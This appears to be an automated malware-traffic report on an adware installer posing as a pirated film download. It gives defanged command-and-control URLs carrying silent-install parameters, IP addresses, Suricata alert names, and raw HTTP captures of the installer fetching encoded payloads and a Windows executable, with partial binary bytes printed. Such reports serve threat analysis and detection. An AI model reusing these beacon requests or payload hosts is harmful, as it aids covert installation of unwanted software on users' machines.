hxxp://c1.goody-best.info/?step_id=4_3&sf=1&installer_id=2249414903470210647&publisher_id=24379&source_id=0&page_id=0&affiliate_id=0&country_code=UA&locale=EN&browser_id=4&download_id=2225208770382696055&external_id=0&tag_id=0&installer_type=IX_2013&hardware_id=8738532578695851691&session_id=16580608941307095478&q=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&q=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&product_name=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&installer_file_name=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&jxbo=1&ttl=1434669534790&self_redirect=0&project_encode_id=24379&enc_u_p=1&enc_u_p=1&enc_u_p=1&st=0&st=0&AddToPayLoad=RunOnceMutex="alpha_installer" RunOnceMutexDuration="0" SilentInstall="<$ifte(~=1,1,0)>"&filesize=&sr=1&iid=2249414903470210647&did=2225208770382696055&installer_only=1&st=0&uuid=%2A 54.148.216.39
hxxp://c1.goody-best.info/?step_id=6_1_4&sf=1&installer_id=2249414903470210647&publisher_id=24379&source_id=0&page_id=0&affiliate_id=0&country_code=UA&locale=EN&browser_id=4&download_id=2225208770382696055&external_id=0&tag_id=0&installer_type=IX_2013&hardware_id=8738532578695851691&session_id=16580608941307095478&q=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&q=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&product_name=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&installer_file_name=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&jxbo=1&ttl=1434669534790&self_redirect=0&project_encode_id=24379&enc_u_p=1&enc_u_p=1&enc_u_p=1&st=0&st=0&AddToPayLoad=RunOnceMutex="alpha_installer" RunOnceMutexDuration="0" SilentInstall="<$ifte(~=1,1,0)>"&filesize=&sr=1&iid=2249414903470210647&did=2225208770382696055&installer_only=1&st=0&uuid=%2A 54.148.216.39
hxxp://c1.goody-best.info/?step_id=3&sf=1&installer_id=2249414903470210647&publisher_id=24379&source_id=0&page_id=0&affiliate_id=0&country_code=UA&locale=EN&browser_id=4&download_id=2225208770382696055&external_id=0&tag_id=0&installer_type=IX_2013&hardware_id=8738532578695851691&session_id=16580608941307095478&q=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&q=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&product_name=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&installer_file_name=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&jxbo=1&ttl=1434669534790&self_redirect=0&project_encode_id=24379&enc_u_p=1&enc_u_p=1&enc_u_p=1&st=0&st=0&AddToPayLoad=RunOnceMutex="alpha_installer" RunOnceMutexDuration="0" SilentInstall="<$ifte(~=1,1,0)>"&filesize=&sr=1&iid=2249414903470210647&did=2225208770382696055&installer_only=1&st=0&uuid=%2A 54.148.216.39
hxxp://c1.goody-best.info/?step_id=4_1&sf=1&installer_id=2249414903470210647&publisher_id=24379&source_id=0&page_id=0&affiliate_id=0&country_code=UA&locale=EN&browser_id=4&download_id=2225208770382696055&external_id=0&tag_id=0&installer_type=IX_2013&hardware_id=8738532578695851691&session_id=16580608941307095478&q=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&q=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&product_name=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&installer_file_name=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&jxbo=1&ttl=1434669534790&self_redirect=0&project_encode_id=24379&enc_u_p=1&enc_u_p=1&enc_u_p=1&st=0&st=0&AddToPayLoad=RunOnceMutex="alpha_installer" RunOnceMutexDuration="0" SilentInstall="<$ifte(~=1,1,0)>"&filesize=&sr=1&iid=2249414903470210647&did=2225208770382696055&installer_only=1&st=0&uuid=%2A 54.148.216.39
hxxp://c1.goody-best.info/?step_id=6_2_1&sf=1&installer_id=2249414903470210647&publisher_id=24379&source_id=0&page_id=0&affiliate_id=0&country_code=UA&locale=EN&browser_id=4&download_id=2225208770382696055&external_id=0&tag_id=0&installer_type=IX_2013&hardware_id=8738532578695851691&session_id=16580608941307095478&q=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&q=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&product_name=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&installer_file_name=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&jxbo=1&ttl=1434669534790&self_redirect=0&project_encode_id=24379&enc_u_p=1&enc_u_p=1&enc_u_p=1&st=0&st=0&AddToPayLoad=RunOnceMutex="alpha_installer" RunOnceMutexDuration="0" SilentInstall="<$ifte(~=1,1,0)>"&filesize=&sr=1&iid=2249414903470210647&did=2225208770382696055&installer_only=1&st=0&uuid=%2A 54.148.216.39
hxxp://c1.goody-best.info/?step_id=6_1_2&sf=1&installer_id=2249414903470210647&publisher_id=24379&source_id=0&page_id=0&affiliate_id=0&country_code=UA&locale=EN&browser_id=4&download_id=2225208770382696055&external_id=0&tag_id=0&installer_type=IX_2013&hardware_id=8738532578695851691&session_id=16580608941307095478&q=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&q=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&product_name=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&installer_file_name=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&jxbo=1&ttl=1434669534790&self_redirect=0&project_encode_id=24379&enc_u_p=1&enc_u_p=1&enc_u_p=1&st=0&st=0&AddToPayLoad=RunOnceMutex="alpha_installer" RunOnceMutexDuration="0" SilentInstall="<$ifte(~=1,1,0)>"&filesize=&sr=1&iid=2249414903470210647&did=2225208770382696055&installer_only=1&st=0&uuid=%2A 54.148.216.39
hxxp://c1.goody-best.info/?step_id=7&sf=1&installer_id=2249414903470210647&publisher_id=24379&source_id=0&page_id=0&affiliate_id=0&country_code=UA&locale=EN&browser_id=4&download_id=2225208770382696055&external_id=0&tag_id=0&installer_type=IX_2013&hardware_id=8738532578695851691&session_id=16580608941307095478&q=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&q=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&product_name=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&installer_file_name=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&jxbo=1&ttl=1434669534790&self_redirect=0&project_encode_id=24379&enc_u_p=1&enc_u_p=1&enc_u_p=1&st=0&st=0&AddToPayLoad=RunOnceMutex="alpha_installer" RunOnceMutexDuration="0" SilentInstall="<$ifte(~=1,1,0)>"&filesize=&sr=1&iid=2249414903470210647&did=2225208770382696055&installer_only=1&st=0&uuid=%2A 54.148.216.39
hxxp://c1.goody-best.info/?step_id=6_1&sf=1&installer_id=2249414903470210647&publisher_id=24379&source_id=0&page_id=0&affiliate_id=0&country_code=UA&locale=EN&browser_id=4&download_id=2225208770382696055&external_id=0&tag_id=0&installer_type=IX_2013&hardware_id=8738532578695851691&session_id=16580608941307095478&q=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&q=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&product_name=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&installer_file_name=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&jxbo=1&ttl=1434669534790&self_redirect=0&project_encode_id=24379&enc_u_p=1&enc_u_p=1&enc_u_p=1&st=0&st=0&AddToPayLoad=RunOnceMutex="alpha_installer" RunOnceMutexDuration="0" SilentInstall="<$ifte(~=1,1,0)>"&filesize=&sr=1&iid=2249414903470210647&did=2225208770382696055&installer_only=1&st=0&uuid=%2A 54.148.216.39
hxxp://c1.goody-best.info/?step_id=6_1_3&sf=1&installer_id=2249414903470210647&publisher_id=24379&source_id=0&page_id=0&affiliate_id=0&country_code=UA&locale=EN&browser_id=4&download_id=2225208770382696055&external_id=0&tag_id=0&installer_type=IX_2013&hardware_id=8738532578695851691&session_id=16580608941307095478&q=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&q=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&product_name=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&installer_file_name=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&jxbo=1&ttl=1434669534790&self_redirect=0&project_encode_id=24379&enc_u_p=1&enc_u_p=1&enc_u_p=1&st=0&st=0&AddToPayLoad=RunOnceMutex="alpha_installer" RunOnceMutexDuration="0" SilentInstall="<$ifte(~=1,1,0)>"&filesize=&sr=1&iid=2249414903470210647&did=2225208770382696055&installer_only=1&st=0&uuid=%2A 54.148.216.39
hxxp://c1.goody-best.info/?step_id=5&sf=1&installer_id=2249414903470210647&publisher_id=24379&source_id=0&page_id=0&affiliate_id=0&country_code=UA&locale=EN&browser_id=4&download_id=2225208770382696055&external_id=0&tag_id=0&installer_type=IX_2013&hardware_id=8738532578695851691&session_id=16580608941307095478&q=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&q=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&product_name=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&installer_file_name=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&jxbo=1&ttl=1434669534790&self_redirect=0&project_encode_id=24379&enc_u_p=1&enc_u_p=1&enc_u_p=1&st=0&st=0&AddToPayLoad=RunOnceMutex="alpha_installer" RunOnceMutexDuration="0" SilentInstall="<$ifte(~=1,1,0)>"&filesize=&sr=1&iid=2249414903470210647&did=2225208770382696055&installer_only=1&st=0&uuid=%2A 54.148.216.39
get-bluesee.info 52.26.142.209


IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET MALWARE W32/InstallRex.Adware Initial CnC Beacon
ET USER_AGENTS Suspicious Win32 User Agent
ET MALWARE Adware.Win32/SProtector.A Client Checkin

Traffic

GET /?step_id=6_1&sf=1&installer_id=2249414903470210647&publisher_id=24379&source_id=0&page_id=0&affiliate_id=0&country_code=UA&locale=EN&browser_id=4&download_id=2225208770382696055&external_id=0&tag_id=0&installer_type=IX_2013&hardware_id=8738532578695851691&session_id=16580608941307095478&q=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&q=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&product_name=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&installer_file_name=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&jxbo=1&ttl=1434669534790&self_redirect=0&project_encode_id=24379&enc_u_p=1&enc_u_p=1&enc_u_p=1&st=0&st=0&AddToPayLoad=RunOnceMutex="alpha_installer" RunOnceMutexDuration="0" SilentInstall="<$ifte(~=1,1,0)>"&filesize=&sr=1&iid=2249414903470210647&did=2225208770382696055&installer_only=1&st=0&uuid=%2A HTTP/1.1
Range: bytes=0-
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.75 Safari/535.7
Host: c1.goody-best.info
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: ngx_openresty
Date: Wed, 01 Jul 2015 04:53:10 GMT
Content-Type: text/html
Content-Length: 10286
Connection: close
Content-Disposition: attachment; filename="6_1.txt"
..s.t.f.M.O.t.v.h.Q.X.c.v.Z./.G.j.l.h.r.0.3.8.7.3.0.2.S.e.F.9.r.c.8.U.
C.I.D.P.L.J.U.D.Q.z.v.M.6.d.w.K.M.O.5.C.t.c.3.G.z.G.Q.0.I.U.0.X.3.q.t.
I.p.J.T.o.d.Z.9.d.Y.o.n.G.5.W.F.r.E.A.H.Z.Q.I.O.d.g.6.J.6.U.K.q.h.8.0.
D.M.x.u.W.k.U.t.f.y.L.f.y.O.7.G.X./.c.6.F.Q.a.I.R.o.s.v.t.c.Q.T.G.6.a.
X.n.2.V.W.z. .7.e.q.j.l.0.q.F.U.Q.b.L.D.S.Z.v.2.J.c.I.K.j.p.H.3.A.F.K.
n.W.J.C.V.7.Q.2.T.j.o.b.N.v.l.Z.H.j.w.H.c.P./.n.u.F.q.j.6.x.W.m.a.B.X.
8.S.1.S.t.V.R.A.z.9.V.F.x.j.I./.5.E.N.f.u.k.Q.r.R.R.t.y.z.9.2.4.l.v.K.
c.w.O.O.W.z.a.o.9.J.4.w.B.Z.W.L.y.4.L.c.u.C.h.a.p.g.u.R.8.z.b.U.h.P.x.
3.E.s.j.8.G.g.h.v.8.7.U./.y.u.5.t.V.A.a.K.l.G.w.g.L.x.7.v.W.2.B.O.U.G.
k.m.A.K.V.W.R.X.O.T.2.P.W.y.3.r.5.8.p.d.4.G.l.t.O.n.3.G.U.l.b.7.U.w.e.
S.E./.d.K.L.d.R.X.J.9.9.A.c.0.a.r.n.d.B.f.x.T.e.R.f.z.g.u.M.s.R.l.u.9.
J./.Y.g.E.a.P.W.J.Q.I.f.R.f.U.0.V.W.t.I. .1.A.3.b.N.e.s.E.Y.A.u.K.j.u.
C.X.p.g.g.T.D.E.e.7.n.J.8.q.M.f.1.c.A.R.U.r.f.8.l.5.W.W.z.0.d.6.1.3.1.
m./.6.H.4.A.N.B.V.J.V.y.b.d.I.5.B.D.g.c.t.6.2.M.t.P.4.X.S.a.9.3.3.S.H.
G.V.n.Q.l.F.H.x.V.U.z.W.J.d.E.k.D.Y.g.r.i.f.J.Q.E.M.i.w.y.E./.U.J.M.L.
d.z.z.I.i.8.z.h.C.o.Z.A. .Q.i.W.v.S.T.U.S.Q.g.a.u.H.w.5.u.h.K.l.t.0.F.
8.4.u.t.c.P.j.h.a.m.j.9.6.z.0.5.u.6.D.q.e.Y.T.q.7.A.r.d.t.b.I. .0.G.N.
K.9.W.i.m.E.G.W.Y.K.x.L.O.Y.K.Y.R.E.M.7.C.b.y.g.0.b.J.B.2.z.k.C.n.E.8.
o.9.N.Q.6.O.v.Z.P.a.s.N.R.T.f.s.y./.h.i.P.Y.1.b.m.V.v.c.Z.Y.s.O.9.u.X.
1.M.o.G.a.2.d.A.3.D.7.L.V.a.g.q.O.m.6.H.8.R.d.F.f.2.A.M.C.f.r.n.s.g.s.
z.i.j.G.S.7.r.4.P.d.O.N.1.V.W.r.D.K.g.q.g.E.2.Z.0.K.Q.f.p.t.i.R.I.Q.r.
d.x. .b.Y.r.G.j.w.I.b.4.6.c.V. .U.C.f.6.p.6.n.x.g.H.C.f.4.y.8.d.B.
<<< skipped >>>


GET /?e=eghjkt&cht=2&dcu=1&cpatch=2&dcs=1&pf=1&clsb=1&publisher=24379&&dd=4&country=UA&ind=2249414903470210647&exid=0&ssd=16580608941307095478&hid=8738532578695851691&osid=501&channel=0&sfx=2&ne=1&jc=1&mb=1&install_date=20140701&cha=0 HTTP/1.1
Range: bytes=0-
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.75 Safari/535.7
Host: multipledirect.ru
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: ngx_openresty
Date: Wed, 01 Jul 2015 04:53:13 GMT
Content-Type: application/octet-stream
Content-Length: 545626
Connection: close
Content-Disposition: attachment; filename="hVwDePRrG2aSqC.ca"
Content-Transfer-Encoding: binary
Access-Control-Allow-Origin: *
..z.VS....n..............................Q......[....Tx...p.Ic.....t..
..<B7.... [email protected]}....>If....(k...]xJp....)r....>
;G~..../E.....\).....Zn.....~....;_c....xW.... ]h...T,S....pRh....!J..
...Of....1C*...S.s....4[2.....Y....d.9...A{.....#.U...Fh.A...J.4...Ee.
 ...Xs1....;Go....,.....`.....6~.3...\.%...<cj<...Es/...<`.;.
..Bt.....>^I...H.c....].'[email protected]_...Mz.:.../}.....w.9....%N...
..Ms...5'[email protected]..../p....8Pg....<H....-eu....$H.....YS...0
<Xp...S.b....2sf...."l.....Pi... .T....CAR...O..5... .5...=x.?..._u
.....m.8...RCG....8.3....=Sr....Y-...7..J...(.^....*^y...2.I.....jL...
."Q.....Tz....?Yw...;;X...E..?...*q3....v.5...E{.....W.&...Zjzd.....;.
.. .Co..../p....?]^...Mj ....?[|....p.....S.%...:3_a.....{...\.@y...=4
p.....Tc...1>P....1Hz...}[email protected]...^.[s.....o....Pcy....!G....UHc
....:nD...%.U...Nd.G...D{/...M`.N...]r.....iuI...(.K.....Wx...r.Yd...Z
bM...]!Fd....(n....7M-....<F....@[`....=.`....P9...[;_b....,n....yG
e....)M....~Uu....=J....CEz....=Ft....aw...^%Uz....j?..../P..... .....
C.z....4Lp...F\w....!K'...K1s....;_`....*G....1\1..../Kl...D\z....2X`.
...5h.... Eo....).....5.x...S?D.....N4....(.t....``....>@x....,p...
.7]n...?.......W~....&Fr.....v....1^r...J:s....6_{....f.....5.2....(J.
...C]w...Y&Ca..../i....w@{....51....(F[...P#P....NTv...."Km....Ll...R&
lt;@a....-s....6.3.....Z.....zI...#7Tu... wl...B.iO....4*...9.a`...W.t
....0u[...)[email protected]...(.HL...?)(.....JX....,'.....[I...9o.......@...$
.m0...6.x.....GC...=./.....jS.....e.....}b...B9G.....tD....$EN...Z
<<< skipped >>>


GET /addons/sinstall.exe HTTP/1.1
Accept: */*
Accept-Encoding: identity
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.75 Safari/535.7
Pragma: no-cache
Expect: 100-continue
Host: i1.scanwebresolver.com
Connection: Keep-Alive


HTTP/1.1 100 Continue
HTTP/1.1 200 OK..Server: openresty..Date: Wed, 01 Jul 2015 04:55:15 GM
T..Content-Type: application/octet-stream..Content-Length: 1085440..La
st-Modified: Wed, 04 Feb 2015 13:58:06 GMT..Connection: close..ETag: "
54d2256e-109000"..Accept-Ranges: bytes..MZ......................@.....
..........................................!..L.!This program cannot be
 run in DOS mode....$..........u..d&..d&..d&&..&..d&&..&..d&&..&..d&..
.&..d&..e&~.d&..d&..d&.=.&..d&.=.&..d&.=.&..d&Rich..d&................
PE..L....d.R.................t...D....................@...............
..................?.....@................................. 6..<....
............................r......................................@..
.............$............................text...}s.......t...........
....... ..`.rdata..H............x..............@[email protected].
..,[email protected]...............................@[email protected]...
[email protected].......................................
......................................................................
......................................................................
......................................................................
......................................................................
.................................U..V.u...tP...r...;.u..........s....t
5..:.u'...t*.A.:B.u....t..A.:B.u....t..A.:B.t......^].3.^].U...E..V...
...M.t.V.v........^].................U...E..U....H.].................U
........U..u.R.P..U..H.;J.u...;.u.....]...2...]................U..
<<< skipped >>>


GET /?step_id=6_1_2&sf=1&installer_id=2249414903470210647&publisher_id=24379&source_id=0&page_id=0&affiliate_id=0&country_code=UA&locale=EN&browser_id=4&download_id=2225208770382696055&external_id=0&tag_id=0&installer_type=IX_2013&hardware_id=8738532578695851691&session_id=16580608941307095478&q=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&q=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&product_name=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&installer_file_name=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&jxbo=1&ttl=1434669534790&self_redirect=0&project_encode_id=24379&enc_u_p=1&enc_u_p=1&enc_u_p=1&st=0&st=0&AddToPayLoad=RunOnceMutex="alpha_installer" RunOnceMutexDuration="0" SilentInstall="<$ifte(~=1,1,0)>"&filesize=&sr=1&iid=2249414903470210647&did=2225208770382696055&installer_only=1&st=0&uuid=%2A HTTP/1.1
Range: bytes=0-
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.75 Safari/535.7
Host: c1.goody-best.info
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: ngx_openresty
Date: Wed, 01 Jul 2015 04:53:19 GMT
Content-Type: text/html
Content-Length: 10226
Connection: close
Content-Disposition: attachment; filename="6_1_2.txt"
..p.k.A.O.a.D.W.Q.h.y.e.P.w.e.o.1.2.3.j.k.8.O.0.c.S.7.I.R.F.O.I.L.M.K.
 .T.o.3.Z.x.6.Z.C.Y.H.J.I.h.Q.e.c.4.0.y.K.n.P.e.Q.v.l.e.X.m.N.g.Q.c.Z.
3.2.Y.l.0.2./.3.d.F.X.l.2.2.i.u.I.K.l.4.Y. .A.a.e.T.0.C.F.f.s.x.x.B.p.
/.T.x.k.H.S.8.O.s.y.G.h.y.z.h.t.i.R.D./.M.E.R.v.6.8.N.M.U.S.O.b.x.j.q.
a.C.e.e.F.I.i.c.b.x.I.f.J.f.Z.9.2.V.9.w.h.x.S.0.m.I.l.t.U.n.l.d.S.n.9.
J.m.J.n.A.q.B.A.4.0.c.o.J.r.H.l.Q.4.Q.T.y.O.J.K.d.7.W.o.h.z.f.x.Y.B.v.
N.h.z.T.T.b.h.x.c.I.C.Y.Q.y.q.y.N.n.g.r.n.4.S.g.9.b.F.B.U.0.i.q.Y.z.1.
P.7.F.j.v.l.9.4.L.j.e.b.6.v.6.6.p.w.s.v.L.H.o.a.0.y.i.v.G.I. .Z.j.P.x.
E.Q.z.8.V.U.g.p.Z.q.T./.H.W.1.D.W.V. .u.A.e.q.7.3.M.f.Q.4.c.6.D.r.a.q.
1.H.e.z.8./.J.F.Y.c.J.8.k.w.t.m.N.f.W.I.q.U.F.J.5.R.h.K.P.T.n. .M.U.Z.
b.P.K.L.D.j.2.4.x.J.L.9.9.A.e.G.K.f.3.Y.M.h.V.0.k.Q.F.k.T.x.Y.m.U.T.8.
Z.6.1.F.m.1.I.F.B.P.i.e.0.J.Y.U.u.z.7.7.l.3.v.z.W.R.J.X.P.0.A.n. .o.p.
3.5.8.K.3.j.C.D.e.c.h.g.3.g.9.c.D.N.s.B.L.J.E./.P.U.k.2.C.j.C.Q.s.T.2.
z.D.g.N.y.U.b.S.7.A.g.J.4.p.t.i.B.G.p.2.Z.V.Y.x.2.3.d.H.e.U.W.m.G.L.R.
1.d.G.2.I./.6.g.P.J.u.n.Q.2.B.L.S.K.y.X. .z.s.L.Q.p.8.H.l.l.x.4.O.4.7.
7.1.t.M.L./.J./.f.9.c. .Q.7.T.3.g.R.s.s.j.1.g.d.a.3.5.Y.y.i.X.I.k.r.w.
I.D.d.q.s.P.P.n.6.1.V.T.x.x.T.Z.4.Z.I.i.4.I.o.t.Y.V.c.0.U.5.L.e.h.e.W.
O.b. .u.x.Z.s.E.R.3.B.5.g.o.W.x.0.P.T.5.q.k.9.i.K.Y.B.X.V. .0. .5.P.G.
K.8.s.x.Y.9.b.k.A.a.W.x.a.I.6.2.K.z.9.Q.v.F.G.U.H.J.g.7.T.l.x.z.H.O.K.
e.p.5.U.M.K.Y.P.3.M.x.G./.Z.N. .r.6.q.L.R.l.b. .m.z.2.U.e.x.a.v.3.Q.3.
N.a.T.q.B.W.f.f.W.r.s.w.B.a.Y.L.Z.d.F.E.S.0.4.y.T.0.q.k.H.1.2.G.m.V.O.
7.r.p.8.W.T.C.D.a.8.U.L.P.t.G.S.g.J.B.m.o. .l.7.k.i.D.r.e.S.q.D.i.
<<< skipped >>>


GET /?step_id=4_2&sf=1&installer_id=2249414903470210647&publisher_id=24379&source_id=0&page_id=0&affiliate_id=0&country_code=UA&locale=EN&browser_id=4&download_id=2225208770382696055&external_id=0&tag_id=0&installer_type=IX_2013&hardware_id=8738532578695851691&session_id=16580608941307095478&q=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&q=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&product_name=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&installer_file_name=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&jxbo=1&ttl=1434669534790&self_redirect=0&project_encode_id=24379&enc_u_p=1&enc_u_p=1&enc_u_p=1&st=0&st=0&AddToPayLoad=RunOnceMutex="alpha_installer" RunOnceMutexDuration="0" SilentInstall="<$ifte(~=1,1,0)>"&filesize=&sr=1&iid=2249414903470210647&did=2225208770382696055&installer_only=1&st=0&uuid=%2A HTTP/1.1
Range: bytes=0-
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.75 Safari/535.7
Host: c1.goody-best.info
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: ngx_openresty
Date: Wed, 01 Jul 2015 04:53:06 GMT
Content-Type: text/html
Content-Length: 8364
Connection: close
Content-Disposition: attachment; filename="4_2.txt"
..O.V.v.c.E.m.j.2.Y.Z.n.7.y.k.b.c.d.e.p.Z.W.O.q.Z.2.l.f.U.C.Y.h.2.J.6.
e. .z.8.u.y.6.g./.k.d.U.R.j.D. .Z.o.R.d.N.E.D.J.T.8.d.P.q.z.i.5.V.8.j.
e.R.e.5.X.o.6.X.h.W.W.N.f.T.T.J.g.Q.L.Z.5.3.t.g.K.H.E.0.t.P.t.K.V.L.7.
E.L.Q.f.V.l.h.5.A.z.w.u.D.P.t.B.9.f.c.1.Y.k.K.v.2.Z.c.A.l.a.u.M.d.L.k.
M.V.C.S.T.L.P.1.C.Q.s.P.R.s.3.A.I.H.x.N.6.e.4.8.f.V.n.9.p.P.x.k.Y.S.p.
b./.l.V.n.G.u.s.S.H.g.6.x.5.K. .3.c.O.D.L.T.m.H.W.2.2.7.q.P.C.7.0.r.a.
w.t.P.i.d.5.e.j.0.Z.m.k.y.1.b.O.0.E.E.c.3.z.D.r.9.w.a.E.u.V.y.q.k./.D.
D.d.N.E.a.P.O.0.W.1.S.k. .5.p.V.G.W.M.G.t.B.D.z.q.i.G.5.U.j.K.q.c.P.W.
n.U.R.S.i.B.A.O.Z.6.W.b.g.4.y.3.z.A.l.9.y.V.6.W.3.U.V.3.L.p.Y.d.J.F.Q.
7.x. .i.j.0.j.9.c.7. .p.Z.t.A.6.8.E.r.D.b.z.c.F.r.j.P.3.g.z.4.q.A.Y.2.
s.r.e.O.s.u.7.f.N.g.l.J.X.2.H.1.f.Z.o.0.q.V.Q.F.r.c.V.8.j.1.j.k.x.8.2.
f.r.E.P.B.U.X.5.B.Z.J.s.T.F.u.e.Y.1.B.j.2.A.j.m.p.z.B.5.s.s.2.K.D.z.1.
e.v.M.F.M.k.Q.Q.l.t.s.6.4.Z.x.d.6.l.r.j.9.a.K.2.O.h.H.u.b.O.r.2.g.C.i.
0.2.K.l.l./.m.e.K.a.M.f. .5.j./.X.P.3.n.J.3.p.X.I.n.b.C.w.U.b.d. ./.N.
n.6. .U.O.6.8.G.8.7.j.q.K.p.F.W.X. .W.R.0.1.7.c.r.o.t.a.N.P.L.X.z.8.Q.
g.x.w.j.i.b.T.R.L.m.a.A.a.U.V.z.u.s.B.x.1.G.l.4./.p.r.O.R.3.l.4.X.2.H.
N.I.k.A.z.f.9.o.h.T.E.A.j.B.B.Q.E.v.A.x.J.7.d.i.Y.A.t.T.3.a.X.J.f.s.O.
6.j.S. .7.a.E.e.S.8.M.E.b.o.y.f.v.V.v.E.2.G.Z.B.d.V.I.Z.C.v./.q.r.m.U.
C.u.j.7.G.F.Z.E.p.i.Z.M.B.F.E.5.f.3.c.X.H.Z.G.k.z.E.h.u.5.p.p.S.4.P.N.
p.V.t.b.q.P.U.G.2.Z.G.6.2.j.p.Z.n.a.K.W.H./.J.w.S.p.t.s.i.E.1.O.A.c.F.
t.4.H.Y.M.8.7.r.G.E.A.V.0.c.d.s.m./.N.I.N.d.g.5.t.U.V.V.6.h.J./.G.Z.d.
U.J.I.6.u.Z. .2.8.b.f.v.f.n.S.m.S.T.S.5.d.z.w.g.s.Z.C.6.q.f.u.X.G.
<<< skipped >>>


GET /?step_id=4&sf=1&installer_id=2249414903470210647&publisher_id=24379&source_id=0&page_id=0&affiliate_id=0&country_code=UA&locale=EN&browser_id=4&download_id=2225208770382696055&external_id=0&tag_id=0&installer_type=IX_2013&hardware_id=8738532578695851691&session_id=16580608941307095478&q=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&q=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&product_name=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&installer_file_name=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&jxbo=1&ttl=1434669534790&self_redirect=0&project_encode_id=24379&enc_u_p=1&enc_u_p=1&enc_u_p=1&st=0&st=0&AddToPayLoad=RunOnceMutex="alpha_installer" RunOnceMutexDuration="0" SilentInstall="<$ifte(~=1,1,0)>"&filesize=&sr=1&iid=2249414903470210647&did=2225208770382696055&installer_only=1&st=0&uuid=%2A HTTP/1.1
Range: bytes=0-
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.75 Safari/535.7
Host: c1.goody-best.info
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: ngx_openresty
Date: Wed, 01 Jul 2015 04:53:05 GMT
Content-Type: text/html
Content-Length: 8366
Connection: close
Content-Disposition: attachment; filename="4.txt"
..s.O.b.W.Y.G.f.T.a. .v.0.u.8.g.B.C.D.2.j.m.N.x.3.5.X.l.6.G./.o.m.F.2.
5.K.a.I.h.7.x.i.u.d.S.X.g.z.6.K.K.f.Y.p.k.6.w.H.i.k.F./.M.m.p.l.F.9.G.
W.u.M.w.a.L.7.D.O.W.A.T.r.N.a.Y.B.S.T.q.y.1.z.K.c.U.W.b.F.s.H.O.M.3.5.
k.o.3.e.o.a.D.K.6.z.e.R.u.c.s.y.D.g. .p.u.P.q.8.I./.g.D.t.V.j.n.i.s.V.
L.p.F.c.G.e.r.f.x.w.h.K.q.k.f.C.d.r. .T.7.Q.d.a.Y.H.W. .E.g.N.q.9.j.E.
K.t.s.H.3.T.7.l.f.k.h.E.Z.s.e.s.s.X./.l.M.A.0.3.a.g.y.i.V.7.n.0.U.0.D.
G.9.Z.w.T.K.x.E.B.c.u.y.p.A.J.y.D.S.q.G.E.Q.5.9.G.s.4.i.Y.9.y. .C.I.a.
O.E.e.u.8.z.n.8.A.S.L.S.j.v.W. .L.J.7.5.M.t.V.u.l.b.A.L.u.9.R.h.7./.F.
